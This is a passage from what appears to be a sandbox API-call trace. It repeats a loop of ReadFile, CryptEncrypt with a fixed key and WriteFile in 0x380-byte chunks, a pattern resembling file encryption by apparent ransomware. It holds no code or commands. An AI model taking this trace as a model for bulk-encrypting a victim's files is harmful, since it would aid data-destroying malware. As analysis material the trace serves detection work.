hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.402] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.402] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.402] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.402] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.402] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.402] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.402] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.402] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.402] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.402] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.402] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.402] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.403] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.403] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.403] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.403] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.403] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.403] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.403] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.403] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.403] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.403] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.403] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.403] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.403] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.403] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.403] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.404] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.404] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.404] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.404] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.404] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.404] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.404] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.404] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.404] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.404] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.404] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.404] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.404] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.404] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.404] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.405] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.405] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.405] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.405] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.405] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.405] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.405] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.405] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.405] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.405] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.405] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.405] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.405] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.405] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.405] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.405] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.405] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.405] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.406] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.406] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.406] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.406] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.406] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.406] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.406] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.406] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.406] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.406] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.406] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.406] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.406] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.406] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.406] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.406] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.406] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.406] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.407] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.407] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.407] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.407] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.407] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.407] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.407] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.407] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.407] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.407] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.407] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.407] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.407] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.407] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.407] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.407] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.407] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.407] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.408] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.408] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.408] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.408] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.408] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.408] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.408] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 